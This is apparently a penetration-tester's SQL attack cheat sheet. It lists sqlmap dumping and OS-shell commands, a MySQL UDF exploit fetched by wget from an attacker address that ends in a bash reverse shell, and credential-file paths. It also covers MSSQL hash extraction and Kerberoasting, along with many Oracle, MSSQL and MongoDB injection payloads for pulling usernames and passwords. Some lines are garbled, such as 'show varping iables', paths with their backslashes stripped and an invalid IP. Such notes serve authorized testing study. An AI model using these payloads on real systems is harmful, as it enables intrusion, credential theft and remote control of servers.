All commands listed here assumes you have a command prompt…
All listed items are separate commands unless otherwise specified…

RESOURCES TO USE DURING TESTING

this is a MSSQL Practical Injection cheat sheet
this is another SQL injection sheet
this is a list of escape characters
…there are plenty more online

CONNECT TO SQL SERVER

sqsh -S <IP> -U <Username> -P <Password> -D <Database> mysql -u user -p password mysql -u user -p password -h host

QUICKLY SAVE A QUERY THROUGH BURPSUITE

…NOTE… this is not usable on an OSCP exam

http://ip.com/whatever.php?id=1 INTERCEPT WITH BURP - NO FORWARD RIGHT CLICK AND HIT 'SAVE ITEM' USE SQLMAP WITH SAVED ITEM sqlmap -r <file> --banner (takes a while to run) sqlmap -r <file> --users sqlmap -r <file> --is-dba sqlmap -r <file> --dbs sqlmap -r <file> -D <db> --tables --threads=10 sqlmap -r <file> -D <db> -T <table> --columns --threads=10 sqlmap -r <file> -D <db> -T <table> --columns --hex --threads=10 (sometime it shows more) sqlmap -r <file> -D <db> -T <table> --columns --dump --threads=10 sqlmap -r <file> -D <db> -T <table> --columns --dump --force-pivoting --threads=10 RUN FOR ALL TABLES AND COLUMNS sqlmap -r <file> -D ecomerce -T user --columns --dump --force-pivoting --threads=10 TRY A SYSTEM SHELL sqlmap -r mssql --os-shell --threads 10 os-shell> whoami

MYSQL ENUMERATION

…requires credentials

mysql --host=127.0.0.1 --port=13306 --user=wp -p MariaDB [(none)]> SHOW Grants; MariaDB [(none)]> show varping iables;

MYSQL EXPLOIT

… creates function within mysql, then executes command using root

# GRAB THE EXPLOIT TO COMPILE git clone https://github.com/1N3/PrivEsc.git gcc -m32 -g -c raptor_udf2.c gcc -m32 -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc ls lib_mysqludf_sys_0.0.3.tar.gz raptor_udf2.c raptor_udf2.o raptor_udf2.so raptor_udf.c # ON TARGET MAKE A DIRECTORY /tmp/tmp mkdir /tmp/tmp cd /tmp/tmp wget http://192.168.119.299:443/raptor_udf2.so cp raptor_udf2.so raptor.so mysql> create table foo(line blob); Query OK, 0 rows affected (0.01 sec) mysql> insert into foo values(load_file('/tmp/tmp/raptor.so')); Query OK, 1 row affected (0.00 sec) mysql> select * from foo into dumpfile '/usr/lib/raptor.so'; Query OK, 1 row affected (0.00 sec) mysql> create function do_system returns integer soname 'raptor.so'; Query OK, 0 rows affected, 1 warning (0.00 sec) mysql> select * from mysql.func; +-----------+-----+-----------+----------+ | name | ret | dl | type | +-----------+-----+-----------+----------+ | do_system | 2 | raptor.so | function | +-----------+-----+-----------+----------+ 1 row in set (0.00 sec) mysql> select do_system('bash -i >& /dev/tcp/192.168.119.299/80 0>&1');

CREDENTIAL LOCATIONS

… may be able to find files with credentials
… here are a couple common ones

# PLAIN TEXT DIRECTORY STRUCTURE C:Program FilesMicrosoft SQL ServerMSSQL14.SQLEXPRESSMSSQLTemplate Datamaster.mdf # OLDER NT DIRECTORY STRUCTURE C:\PROGRA~1\MICROS~2\MSSQL1~1.SQL\MSSQL\Binn\Templates\master.mdf # SAME OLDER STRUCTURE PROGRA~1MICROS~2MSSQL1~1.SQLMSSQLBinnTemplatesmaster.mdf # POWERSHELL - RETRIEVE HASHES Add-Type -Path 'OrcaMDF.RawCore.dll' Add-Type -Path 'OrcaMDF.Framework.dll' import-module .Get-MDFHashes.ps1 Get-MDFHashes -mdf "C:UsersadminDesktopmaster.mdf" # IF THE FILE IS IN USE, ONLY BACKUPS CAN BE USED FOR THIS # HASHCAT MODULE -m 1731 # CREATE HASHCAT READABLE HASH Invoke-Kerberoast -outputformat hashcat | fl hashcat -m 13100

SQL INJECTION QUERIES

… these are just a few common ones
here and here and here are more (just google it)

# HAD TO FIND THE NUMBER OF COLUMNS # FIND WHICH COULD BE USED FOR INJECTION # ORACLE # VERSION admin' or 1=1 union select (select banner from v$version where rownum=1),null,null from dual-- # DB NAME admin' or 1=1 union select global_name,null,null from global_name-- # TABLE NAME admin' or 1=1 union select table_name,null,null from all_tables-- # COLUMNS admin' or 1=1 union select column_name,null,null from all_tab_columns where table_name='user_table'-- # LOOT admin' or 1=1 union SELECT username FROM all_users-- admin' or 1=1 union SELECT username,null,null FROM all_users-- admin' or 1=1 union SELECT name FROM sys.user$-- admin' or 1=1 union SELECT column_name FROM all_tab_columns WHERE table_name = WEB_ADMINS-- admin' or 1=1 union SELECT column_name,null,null FROM all_tab_columns WHERE table_name = 'WEB_ADMINS'-- admin' or 1=1 union SELECT PASSWORD,null,null FROM WEB_ADMINS-- # USED TWO COLUMNS TO SEE USER / HASH admin' or 1=1 union SELECT PASSWORD,ADMIN_NAME,null FROM WEB_ADMINS-- # MSSQL ',convert(int,db_name(6))-- ',convert(int,(select+top+1+table_name+from+archive.information_schema.tables)))-- ',convert(int,(SELECT TOP 1 COLUMN_NAME FROM archive.information_schema.columns)))-- ',CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 alogin FROM (SELECT top 1 alogin FROM archive..pmanager ORDER BY alogin ASC) sq ORDER BY alogin DESC)+CHAR(58)+CHAR(58))))-- # MONGODB condition=aaa';shellcode=unescape... db.my_collection.find({'$where':'shellcode=unescape.... # THIS GOT REDICULOUS... NEED TO LEARN MORE # MSSQL (REDICULOUS!) # syntax is [server].[database].[schema].[table] ',convert(int,db_name(6))-- ',convert(int,(select+top+1+table_name+from+archive.information_schema.tables)))-- ',convert(int,(select+top+1+username+from+users)))-- ',convert(int,(SELECT TOP 1 COLUMN_NAME FROM archive.information_schema.columns)))-- ',CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 alogin FROM (SELECT top 1 alogin FROM archive..pmanager ORDER BY alogin ASC) sq ORDER BY alogin DESC)+CHAR(58)+CHAR(58))))--

SQL INJECTION BASIC STRATEGY EXPLAINED

this is the reference for may of the commands below

# THE ',convert(int,( )))-- IS USED AS A CLIPBOARD... PUT INQUIRY INSIDE # FIND DATABASE NAMES convert(int,db_name())-- # OBTAIN TABLE NAMES select+top+1+table_name+from+information_schema.tables ',convert(int,( )))-- # LOOK FOR SECOND TABLE BASE OFF OF PREVIOUS RESULTS select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads') ',convert(int,( )))-- # AND FOR ANOTHER TABLE BASED OFF OF PREVIOUS RESULTS... TILL THERE ARE NO MORE select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads','users') ',convert(int,( )))-- RECORD DELETED = NO MORE DATABASES # NEXT TARGET COLUMNS select+top+1+column_name+from+information_schema.columns+where+table_name='users' ',convert(int,( )))-- # SECOND COLUMN OF THE TABLE WE FOUND select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname') ',convert(int,( )))-- # CONTINUE UNTIL RECORD HAS BEEN DELETED = LAST COLUMN select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname','upass') ',convert(int,( )))-- # GETTING THE DATA - SAME METHOD USING TABLE AND COLUMN select+top+1+uname+from+users ',convert(int,( )))-- # SECOND VALUE AND SO ON select+top+1+uname+from+users+where+uname+not+in+('admin') ',convert(int,( )))-- # THIRD VALUE AND SO ON TILL RECORD DELETED = LAST VALUE select+top+1+uname+from+users+where+uname+not+in+('admin','cwh') ',convert(int,( )))--

Scroll to top